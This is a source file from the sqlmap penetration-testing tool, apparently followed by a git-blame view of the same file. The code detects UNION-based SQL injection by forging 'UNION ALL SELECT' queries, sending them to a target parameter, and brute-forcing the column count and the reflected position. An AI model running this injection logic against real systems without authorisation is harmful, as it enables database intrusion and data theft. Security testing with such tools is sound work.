sqlmap/lib/techniques/inband/union/test.py

#!/usr/bin/env python

"""
$Id$

Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""

import re
import time

from lib.core.agent import agent
from lib.core.common import clearConsoleLine
from lib.core.common import dataToStdout
from lib.core.common import backend
from lib.core.common import extractRegexResult
from lib.core.common import getUnicode
from lib.core.common import parseUnionPage
from lib.core.common import randomStr
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.enums import DBMS
from lib.core.enums import PAYLOAD
from lib.core.settings import FROM_TABLE
from lib.core.unescaper import unescaper
from lib.parse.html import htmlParser
from lib.request.connect import Connect as Request

def __unionPosition(comment, place, parameter, value, prefix, suffix, count, where=1):
    validPayload = None
    vector = None

    # For each column of the table (# of NULL) perform a request using
    # the UNION ALL SELECT statement to test it the target url is
    # affected by an exploitable inband SQL injection vulnerability
    for position in range(0, count):
        # Prepare expression with delimiters
        randQuery = randomStr()
        randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
        randQueryUnescaped = unescaper.unescape(randQueryProcessed)

        # Forge the inband SQL injection request
        query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, conf.uChar)
        payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)

        # Perform the request
        resultPage, _ = Request.queryPage(payload, place=place, content=True, raise404=False)

        if extractRegexResult('(?P<result>UNION ALL SELECT)', resultPage, re.I):
            continue

        if resultPage and randQuery in resultPage:
            validPayload = payload
            vector = (position, count, comment, prefix, suffix, conf.uChar, where)

            if where == 1:
                # Prepare expression with delimiters
                randQuery2 = randomStr()
                randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
                randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2)

                # Confirm that it is a full inband SQL injection
                query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, conf.uChar, multipleUnions=randQueryUnescaped2)
                payload = agent.payload(place=place, parameter=parameter, newValue=query, where=2)

                # Perform the request
                resultPage, _ = Request.queryPage(payload, place=place, content=True, raise404=False)

                if extractRegexResult('(?P<result>UNION ALL SELECT)', resultPage, re.I):
                    continue

                if resultPage and ((randQuery in resultPage and randQuery2 not in resultPage) or (randQuery not in resultPage and randQuery2 in resultPage)):
                    vector = (position, count, comment, prefix, suffix, conf.uChar, 2)

            break

    return validPayload, vector

def __unionConfirm(comment, place, parameter, value, prefix, suffix, count):
    validPayload = None
    vector = None

    # Confirm the inband SQL injection and get the exact column
    # position which can be used to extract data
    validPayload, vector = __unionPosition(comment, place, parameter, value, prefix, suffix, count)

    # Assure that the above function found the exploitable full inband
    # SQL injection position
    if not validPayload:
        validPayload, vector = __unionPosition(comment, place, parameter, value, prefix, suffix, count, where=2)

    return validPayload, vector

def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix):
    """
    This method tests if the target url is affected by an inband
    SQL injection vulnerability. The test is done up to 50 columns
    on the target database table
    """

    validPayload = None
    vector = None
    query = agent.prefixQuery("UNION ALL SELECT %s" % conf.uChar)

    for count in range(conf.uColsStart, conf.uColsStop+1):
        if backend.getIdentifiedDbms() in FROM_TABLE and query.endswith(FROM_TABLE[backend.getIdentifiedDbms()]):
            query = query[:-len(FROM_TABLE[backend.getIdentifiedDbms()])]

        if count:
            query += ", %s" % conf.uChar

        if backend.getIdentifiedDbms() in FROM_TABLE:
            query += FROM_TABLE[backend.getIdentifiedDbms()]

        status = "%d/%d" % (count, conf.uColsStop)
        debugMsg = "testing %s columns (%d%%)" % (status, round(100.0*count/conf.uColsStop))
        logger.debug(debugMsg)

        validPayload, vector = __unionConfirm(comment, place, parameter, value, prefix, suffix, count)

        if validPayload:
            break

    clearConsoleLine(True)

    return validPayload, vector

def unionTest(comment, place, parameter, value, prefix, suffix):
    """
    This method tests if the target url is affected by an inband
    SQL injection vulnerability. The test is done up to 3*50 times
    """

    if conf.direct:
        return

    kb.technique = PAYLOAD.TECHNIQUE.UNION
    validPayload, vector = __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)

    if validPayload:
        validPayload = agent.removePayloadDelimiters(validPayload, False)

    return validPayload, vector
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`#!/usr/bin/env python`

			`"""`
propsets.. 2008-10-15 19:56:32 +04:00			$Id$
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
large commit with copyright header modifications 2010-10-14 18:41:14 +04:00			`Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)`
sorry, cosmetics 2010-10-15 03:18:29 +04:00			`See the file 'doc/COPYING' for copying permission`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`"""`

minor improvement 2011-01-23 14:35:24 +03:00			`import re`
adding progress to --union-test 2011-01-06 12:26:01 +03:00			`import time`

After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`from lib.core.agent import agent`
adding progress to --union-test 2011-01-06 12:26:01 +03:00			`from lib.core.common import clearConsoleLine`
			`from lib.core.common import dataToStdout`
Major code refactoring - centralized all kb.dbms* info for both retrieval and set. 2011-01-20 02:06:15 +03:00			`from lib.core.common import backend`
minor improvement over last version - case insensitive and takes in count cases like " UNION ALL selects " from MySQL error message 2011-01-23 13:51:57 +03:00			`from lib.core.common import extractRegexResult`
More bug fixes to properly distinguish between full inband and single-entry inband sql injections 2010-12-22 18:47:52 +03:00			`from lib.core.common import getUnicode`
			`from lib.core.common import parseUnionPage`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`from lib.core.common import randomStr`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`from lib.core.data import conf`
			`from lib.core.data import kb`
			`from lib.core.data import logger`
Minor improvement when testing for UNION query SQL injection to check only without comment and with DBMS specific comment (not anymore "random" unspecific comment characters) 2008-12-02 02:09:07 +03:00			`from lib.core.data import queries`
further refactoring (all enumerations are now put into enums.py) 2010-11-08 12:20:02 +03:00			`from lib.core.enums import DBMS`
minor update 2010-12-08 16:09:27 +03:00			`from lib.core.enums import PAYLOAD`
Major bug fix to properly process custom queries (--sql-query/--sql-shell) when technique in use is error-based. Alignment of SQL statement payload packing/unpacking between all of the techniques. Minor bug fix to use the proper charset (2, numbers) when dealing with COUNT() in custom queries too. Minor code cleanup. 2011-01-19 02:02:11 +03:00			`from lib.core.settings import FROM_TABLE`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`from lib.core.unescaper import unescaper`
			`from lib.parse.html import htmlParser`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`from lib.request.connect import Connect as Request`

Major bug fix. Minor code refactoring. 2011-01-16 04:17:09 +03:00			`def __unionPosition(comment, place, parameter, value, prefix, suffix, count, where=1):`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`validPayload = None`
Properly deal with partial (single entry) UNION injections. Got rid of kb.union*, now it's all stored/used from kb.injection. Minor bug fix with where=2 detection phase. 2011-01-12 15:01:32 +03:00			`vector = None`
fixes #181 - proper save/resume information about single entry UNION SQL injection 2010-03-22 18:39:29 +03:00
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`# For each column of the table (# of NULL) perform a request using`
			`# the UNION ALL SELECT statement to test it the target url is`
			`# affected by an exploitable inband SQL injection vulnerability`
Important bug fix. Minor code restyling. 2011-01-13 12:41:55 +03:00			`for position in range(0, count):`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`# Prepare expression with delimiters`
			`randQuery = randomStr()`
			`randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)`
Major bug fix. Minor code refactoring. 2011-01-16 04:17:09 +03:00			`randQueryUnescaped = unescaper.unescape(randQueryProcessed)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`# Forge the inband SQL injection request`
Important bug fix. Minor code restyling. 2011-01-13 12:41:55 +03:00			`query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, conf.uChar)`
First big commit to move UNION query tests to detection phase - there are some improvements and tuning to do yet though. Major refactoring to Agent.payload() method. Minor bug fixes, some code refactoring and a lot of core adjustments here and there. Added more checks for injection in GROUP BY and ORDER BY. 2011-01-12 01:18:47 +03:00			`payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`# Perform the request`
bug fix (some sites raise 404 during union tests) 2011-01-15 19:42:33 +03:00			`resultPage, _ = Request.queryPage(payload, place=place, content=True, raise404=False)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
this was bad thing to have 2011-01-25 04:08:38 +03:00			`if extractRegexResult('(?P<result>UNION ALL SELECT)', resultPage, re.I):`
minor improvement 2011-01-23 14:35:24 +03:00			`continue`

			`if resultPage and randQuery in resultPage:`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`validPayload = payload`
Important bug fix. Minor code restyling. 2011-01-13 12:41:55 +03:00			`vector = (position, count, comment, prefix, suffix, conf.uChar, where)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
First big commit to move UNION query tests to detection phase - there are some improvements and tuning to do yet though. Major refactoring to Agent.payload() method. Minor bug fixes, some code refactoring and a lot of core adjustments here and there. Added more checks for injection in GROUP BY and ORDER BY. 2011-01-12 01:18:47 +03:00			`if where == 1:`
More bug fixes to properly distinguish between full inband and single-entry inband sql injections 2010-12-22 18:47:52 +03:00			`# Prepare expression with delimiters`
			`randQuery2 = randomStr()`
			`randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)`
Major bug fix. Minor code refactoring. 2011-01-16 04:17:09 +03:00			`randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2)`
More bug fixes to properly distinguish between full inband and single-entry inband sql injections 2010-12-22 18:47:52 +03:00
			`# Confirm that it is a full inband SQL injection`
Important bug fix. Minor code restyling. 2011-01-13 12:41:55 +03:00			`query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, conf.uChar, multipleUnions=randQueryUnescaped2)`
First big commit to move UNION query tests to detection phase - there are some improvements and tuning to do yet though. Major refactoring to Agent.payload() method. Minor bug fixes, some code refactoring and a lot of core adjustments here and there. Added more checks for injection in GROUP BY and ORDER BY. 2011-01-12 01:18:47 +03:00			`payload = agent.payload(place=place, parameter=parameter, newValue=query, where=2)`
More bug fixes to properly distinguish between full inband and single-entry inband sql injections 2010-12-22 18:47:52 +03:00
			`# Perform the request`
bug fix (some sites raise 404 during union tests) 2011-01-15 19:42:33 +03:00			`resultPage, _ = Request.queryPage(payload, place=place, content=True, raise404=False)`
More bug fixes to properly distinguish between full inband and single-entry inband sql injections 2010-12-22 18:47:52 +03:00
this was bad thing to have 2011-01-25 04:08:38 +03:00			`if extractRegexResult('(?P<result>UNION ALL SELECT)', resultPage, re.I):`
minor improvement 2011-01-23 14:35:24 +03:00			`continue`

			`if resultPage and ((randQuery in resultPage and randQuery2 not in resultPage) or (randQuery not in resultPage and randQuery2 in resultPage)):`
Important bug fix. Minor code restyling. 2011-01-13 12:41:55 +03:00			`vector = (position, count, comment, prefix, suffix, conf.uChar, 2)`
More bug fixes to properly distinguish between full inband and single-entry inband sql injections 2010-12-22 18:47:52 +03:00
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`break`

Properly deal with partial (single entry) UNION injections. Got rid of kb.union*, now it's all stored/used from kb.injection. Minor bug fix with where=2 detection phase. 2011-01-12 15:01:32 +03:00			`return validPayload, vector`
fixes #181 - proper save/resume information about single entry UNION SQL injection 2010-03-22 18:39:29 +03:00
Major bug fix. Minor code refactoring. 2011-01-16 04:17:09 +03:00			`def __unionConfirm(comment, place, parameter, value, prefix, suffix, count):`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`validPayload = None`
Properly deal with partial (single entry) UNION injections. Got rid of kb.union*, now it's all stored/used from kb.injection. Minor bug fix with where=2 detection phase. 2011-01-12 15:01:32 +03:00			`vector = None`
fixes #181 - proper save/resume information about single entry UNION SQL injection 2010-03-22 18:39:29 +03:00
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`# Confirm the inband SQL injection and get the exact column`
Major enhancement to --union-test check 2010-11-14 01:47:37 +03:00			`# position which can be used to extract data`
Major bug fix. Minor code refactoring. 2011-01-16 04:17:09 +03:00			`validPayload, vector = __unionPosition(comment, place, parameter, value, prefix, suffix, count)`
One more step to fully working UNION exploitation after merge into detection phase 2011-01-12 04:13:32 +03:00
			`# Assure that the above function found the exploitable full inband`
			`# SQL injection position`
			`if not validPayload:`
Major bug fix. Minor code refactoring. 2011-01-16 04:17:09 +03:00			`validPayload, vector = __unionPosition(comment, place, parameter, value, prefix, suffix, count, where=2)`
One more step to fully working UNION exploitation after merge into detection phase 2011-01-12 04:13:32 +03:00
Properly deal with partial (single entry) UNION injections. Got rid of kb.union*, now it's all stored/used from kb.injection. Minor bug fix with where=2 detection phase. 2011-01-12 15:01:32 +03:00			`return validPayload, vector`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00
Major bug fix. Minor code refactoring. 2011-01-16 04:17:09 +03:00			`def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix):`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`"""`
			`This method tests if the target url is affected by an inband`
			`SQL injection vulnerability. The test is done up to 50 columns`
			`on the target database table`
			`"""`

First big commit to move UNION query tests to detection phase - there are some improvements and tuning to do yet though. Major refactoring to Agent.payload() method. Minor bug fixes, some code refactoring and a lot of core adjustments here and there. Added more checks for injection in GROUP BY and ORDER BY. 2011-01-12 01:18:47 +03:00			`validPayload = None`
Properly deal with partial (single entry) UNION injections. Got rid of kb.union*, now it's all stored/used from kb.injection. Minor bug fix with where=2 detection phase. 2011-01-12 15:01:32 +03:00			`vector = None`
Added new switch --union-char to be able to provide the character used in union-test and exploit (default is still NULL, but can be any) 2010-11-19 17:56:20 +03:00			`query = agent.prefixQuery("UNION ALL SELECT %s" % conf.uChar)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
First big commit to move UNION query tests to detection phase - there are some improvements and tuning to do yet though. Major refactoring to Agent.payload() method. Minor bug fixes, some code refactoring and a lot of core adjustments here and there. Added more checks for injection in GROUP BY and ORDER BY. 2011-01-12 01:18:47 +03:00			`for count in range(conf.uColsStart, conf.uColsStop+1):`
Major code refactoring - centralized all kb.dbms* info for both retrieval and set. 2011-01-20 02:06:15 +03:00			`if backend.getIdentifiedDbms() in FROM_TABLE and query.endswith(FROM_TABLE[backend.getIdentifiedDbms()]):`
			`query = query[:-len(FROM_TABLE[backend.getIdentifiedDbms()])]`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
First big commit to move UNION query tests to detection phase - there are some improvements and tuning to do yet though. Major refactoring to Agent.payload() method. Minor bug fixes, some code refactoring and a lot of core adjustments here and there. Added more checks for injection in GROUP BY and ORDER BY. 2011-01-12 01:18:47 +03:00			`if count:`
Added new switch --union-char to be able to provide the character used in union-test and exploit (default is still NULL, but can be any) 2010-11-19 17:56:20 +03:00			`query += ", %s" % conf.uChar`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Major code refactoring - centralized all kb.dbms* info for both retrieval and set. 2011-01-20 02:06:15 +03:00			`if backend.getIdentifiedDbms() in FROM_TABLE:`
			`query += FROM_TABLE[backend.getIdentifiedDbms()]`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
More refactoring and cleanup 2011-01-16 03:15:30 +03:00			`status = "%d/%d" % (count, conf.uColsStop)`
			`debugMsg = "testing %s columns (%d%%)" % (status, round(100.0*count/conf.uColsStop))`
Added generic and mysql UNION tests from 1 to 25 columns. Adapted config file and command line removing now outdated --union-test switch. Minor bug fix. Minor code refactoring. Got rid of some debug messages, standardized logging of UNION tests. 2011-01-12 01:56:21 +03:00			`logger.debug(debugMsg)`
First big commit to move UNION query tests to detection phase - there are some improvements and tuning to do yet though. Major refactoring to Agent.payload() method. Minor bug fixes, some code refactoring and a lot of core adjustments here and there. Added more checks for injection in GROUP BY and ORDER BY. 2011-01-12 01:18:47 +03:00
Major bug fix. Minor code refactoring. 2011-01-16 04:17:09 +03:00			`validPayload, vector = __unionConfirm(comment, place, parameter, value, prefix, suffix, count)`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00
Finally a proper union query SQL injection test engine for --union-test. It does much more requests, but for god sake now it works well! 2010-11-18 20:55:43 +03:00			`if validPayload:`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00			`break`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
adding progress to --union-test 2011-01-06 12:26:01 +03:00			`clearConsoleLine(True)`

Properly deal with partial (single entry) UNION injections. Got rid of kb.union*, now it's all stored/used from kb.injection. Minor bug fix with where=2 detection phase. 2011-01-12 15:01:32 +03:00			`return validPayload, vector`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Major bug fix. Minor code refactoring. 2011-01-16 04:17:09 +03:00			`def unionTest(comment, place, parameter, value, prefix, suffix):`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`"""`
			`This method tests if the target url is affected by an inband`
			`SQL injection vulnerability. The test is done up to 3*50 times`
			`"""`

Major enhancement to directly connect to the dbms without passing via a sql injection: adapted code accordingly - see #158. This feature relies on python third-party libraries to be able to connect to the database. For the moment it has been implemented for MySQL (with python-mysqldb module) and PostgreSQL (with python-psycopg2 module). Minor layout adjustments. 2010-03-27 02:23:25 +03:00			`if conf.direct:`
			`return`

minor update 2010-12-08 16:09:27 +03:00			`kb.technique = PAYLOAD.TECHNIQUE.UNION`
Major bug fix. Minor code refactoring. 2011-01-16 04:17:09 +03:00			`validPayload, vector = __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Improved --union-cols to accept a range to test for union SQL injection. By default it is 1-20. 2010-11-19 18:48:24 +03:00			`if validPayload:`
Store and resume also UNION char to session file (--union-char) 2010-12-01 13:59:58 +03:00			`validPayload = agent.removePayloadDelimiters(validPayload, False)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Properly deal with partial (single entry) UNION injections. Got rid of kb.union*, now it's all stored/used from kb.injection. Minor bug fix with where=2 detection phase. 2011-01-12 15:01:32 +03:00			`return validPayload, vector`